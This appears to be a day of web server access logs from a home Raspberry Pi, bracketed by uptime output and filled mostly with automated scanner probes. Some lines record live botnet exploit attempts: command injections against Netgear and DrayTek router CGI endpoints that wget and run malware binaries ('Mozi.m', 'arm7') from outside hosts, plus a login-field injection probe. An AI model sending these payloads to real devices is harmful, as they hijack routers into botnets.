Mon Apr 20 06:25:06 MDT 2020
 06:25:06 up 55 days, 10:53,  1 user,  load average: 0.29, 0.21, 0.22
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 55days  1:16m  2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE
84.209.31.236 - - [20/Apr/2020:12:32:48 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0"
84.209.31.236 - - [20/Apr/2020:12:32:50 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
94.102.142.229 - - [20/Apr/2020:12:36:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
3.95.14.24 - - [20/Apr/2020:13:25:59 +0000] "GET /.env HTTP/1.1" 404 0 "" "curl/7.58.0"
3.95.14.24 - - [20/Apr/2020:13:48:07 +0000] "GET / HTTP/1.1" 200 25000 "" "curl/7.58.0"
208.91.109.18 - - [20/Apr/2020:14:11:58 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
208.91.109.18 - - [20/Apr/2020:14:11:59 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
115.58.101.168 - - [20/Apr/2020:15:32:03 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.101.168:42770/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" ""
178.212.229.58 - - [20/Apr/2020:17:02:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
172.104.108.109 - - [20/Apr/2020:17:31:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0"
189.58.132.191 - - [20/Apr/2020:17:53:10 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0"
189.58.132.191 - - [20/Apr/2020:17:53:13 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
192.241.235.76 - - [20/Apr/2020:18:44:25 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
201.43.202.201 - - [20/Apr/2020:18:44:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
208.91.109.18 - - [20/Apr/2020:19:50:40 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
208.91.109.18 - - [20/Apr/2020:19:50:40 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
80.82.70.118 - - [20/Apr/2020:19:58:50 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
45.146.253.35 - - [20/Apr/2020:20:13:58 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
45.146.253.35 - - [20/Apr/2020:20:14:57 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
45.146.253.35 - - [20/Apr/2020:20:15:56 +0000] "GET /pma/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
45.146.253.35 - - [20/Apr/2020:20:16:55 +0000] "GET /mysql/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
45.146.253.35 - - [20/Apr/2020:20:17:55 +0000] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
45.146.253.35 - - [20/Apr/2020:20:18:55 +0000] "GET /sqladmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
45.146.253.35 - - [20/Apr/2020:20:19:53 +0000] "GET /db/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
61.153.110.83 - - [20/Apr/2020:20:30:00 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:20:30:01 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:20:30:01 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:20:30:02 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:20:30:02 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:20:30:03 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:20:30:03 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:20:30:04 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:20:30:04 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.196.65.85 - - [20/Apr/2020:21:32:10 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
93.114.147.218 - - [20/Apr/2020:22:36:16 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
93.114.147.218 - - [20/Apr/2020:22:36:17 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
81.88.232.81 - - [20/Apr/2020:23:02:25 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
192.241.238.130 - - [20/Apr/2020:23:24:48 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
185.216.140.6 - - [20/Apr/2020:23:25:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
138.97.41.182 - - [21/Apr/2020:00:11:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
74.120.200.170 - - [21/Apr/2020:00:26:09 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
74.120.200.170 - - [21/Apr/2020:00:26:09 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
117.157.15.27 - - [21/Apr/2020:01:00:28 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
117.157.15.27 - - [21/Apr/2020:01:00:29 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
117.157.15.27 - - [21/Apr/2020:01:00:30 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
190.128.226.34 - - [21/Apr/2020:02:07:13 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
190.128.226.34 - - [21/Apr/2020:02:07:13 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.220.44.251 - - [21/Apr/2020:02:08:38 +0000] "GET / HTTP/1.1" 400 0 "" ""
61.219.11.153 - - [21/Apr/2020:03:52:40 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
83.97.20.21 - - [21/Apr/2020:04:40:15 +0000] "GET / HTTP/1.0" 200 25000 "" ""
191.240.24.28 - - [21/Apr/2020:05:01:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
192.241.238.92 - - [21/Apr/2020:05:41:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
103.212.90.58 - - [21/Apr/2020:06:14:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
123.200.20.34 - - [21/Apr/2020:06:20:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
99.239.96.222 - - [21/Apr/2020:06:25:29 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
99.239.96.222 - - [21/Apr/2020:06:25:30 +0000] "GET / HTTP/1.1" 200 25000 "" ""
95.67.132.214 - - [21/Apr/2020:06:42:37 +0000] "GET / HTTP/1.1" 400 0 "" ""
176.113.115.249 - - [21/Apr/2020:06:44:32 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
93.91.127.133 - - [21/Apr/2020:07:00:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
31.40.4.154 - - [21/Apr/2020:07:09:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
186.206.244.128 - - [21/Apr/2020:07:17:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
189.239.8.242 - - [21/Apr/2020:08:01:39 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
189.239.8.242 - - [21/Apr/2020:08:01:39 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
Tue Apr 21 06:25:05 MDT 2020
 06:25:06 up 56 days, 10:53,  1 user,  load average: 0.27, 0.24, 0.26
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 56days  1:16m  2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE